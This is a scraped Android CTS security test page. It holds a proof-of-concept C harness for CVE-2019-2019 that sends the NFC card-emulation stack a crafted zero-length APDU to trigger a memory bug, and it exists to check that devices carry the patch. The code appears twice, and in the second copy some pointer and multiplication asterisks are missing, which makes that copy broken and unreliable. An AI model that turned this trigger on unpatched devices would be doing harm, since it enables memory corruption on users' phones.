hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp - platform/cts - Git at Google

 /*
  * Copyright (C) 2021 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
  * You may obtain a copy of the License at
  *
  *      http://www.apache.org/licenses/LICENSE-2.0
  *
  * Unless required by applicable law or agreed to in writing, software
  * distributed under the License is distributed on an "AS IS" BASIS,
  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */

 #include <ce_int.h>
 #include <nfc_int.h>

 #include "../includes/common.h"
 #include "../includes/memutils.h"

 #define OFFSET 8
 #define VULNERABLE_LENGTH 0

 char enable_selective_overload = ENABLE_NONE;

 extern tNFC_CB nfc_cb;
 extern tCE_CB ce_cb;

 void GKI_freebuf(void* p_buf __attribute__((unused))) {}

 void nfc_start_quick_timer(TIMER_LIST_ENT*, uint16_t, uint32_t) {}

 void nfc_stop_timer(TIMER_LIST_ENT*) {}

 void nfc_stop_quick_timer(TIMER_LIST_ENT*) {}

 int main() {
     enable_selective_overload = ENABLE_ALL;
     GKI_init();
     ce_init();
     ce_cb.mem.t4t.status = CE_T4T_STATUS_REG_AID_SELECTED;

     if (ce_select_t4t() != NFC_STATUS_OK) {
         return EXIT_FAILURE;
     }

     tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
     tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
     p_data->data.p_data = (NFC_HDR*)malloc(sizeof(uint8_t) * 16);
     NFC_HDR* p_c_apdu = (NFC_HDR*)p_data->data.p_data;
     p_c_apdu->len = VULNERABLE_LENGTH;
     p_c_apdu->offset = OFFSET;
     uint8_t conn_id = 1;
     TIMER_LIST_ENT pFirst = {};
     nfc_cb.quick_timer_queue.p_first = &pFirst;

     p_cb->p_cback(conn_id, NFC_DATA_CEVT, p_data);

     free(p_data->data.p_data);
     free(p_data);
     enable_selective_overload = ENABLE_NONE;
     return EXIT_SUCCESS;
 }
	/*
	* Copyright (C) 2021 The Android Open Source Project
	*
	* Licensed under the Apache License, Version 2.0 (the "License");
	* you may not use this file except in compliance with the License.
	* You may obtain a copy of the License at
	*
	* http://www.apache.org/licenses/LICENSE-2.0
	*
	* Unless required by applicable law or agreed to in writing, software
	* distributed under the License is distributed on an "AS IS" BASIS,
	* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
	* See the License for the specific language governing permissions and
	* limitations under the License.
	*/

	#include <ce_int.h>
	#include <nfc_int.h>

	#include "../includes/common.h"
	#include "../includes/memutils.h"

	#define OFFSET 8
	#define VULNERABLE_LENGTH 0

	char enable_selective_overload = ENABLE_NONE;

	extern tNFC_CB nfc_cb;
	extern tCE_CB ce_cb;

	void GKI_freebuf(void* p_buf __attribute__((unused))) {}

	void nfc_start_quick_timer(TIMER_LIST_ENT*, uint16_t, uint32_t) {}

	void nfc_stop_timer(TIMER_LIST_ENT*) {}

	void nfc_stop_quick_timer(TIMER_LIST_ENT*) {}

	int main() {
	enable_selective_overload = ENABLE_ALL;
	GKI_init();
	ce_init();
	ce_cb.mem.t4t.status = CE_T4T_STATUS_REG_AID_SELECTED;

	if (ce_select_t4t() != NFC_STATUS_OK) {
	return EXIT_FAILURE;
	}

	tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
	tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
	p_data->data.p_data = (NFC_HDR)malloc(sizeof(uint8_t) 16);
	NFC_HDR* p_c_apdu = (NFC_HDR*)p_data->data.p_data;
	p_c_apdu->len = VULNERABLE_LENGTH;
	p_c_apdu->offset = OFFSET;
	uint8_t conn_id = 1;
	TIMER_LIST_ENT pFirst = {};
	nfc_cb.quick_timer_queue.p_first = &pFirst;

	p_cb->p_cback(conn_id, NFC_DATA_CEVT, p_data);

	free(p_data->data.p_data);
	free(p_data);
	enable_selective_overload = ENABLE_NONE;
	return EXIT_SUCCESS;
	}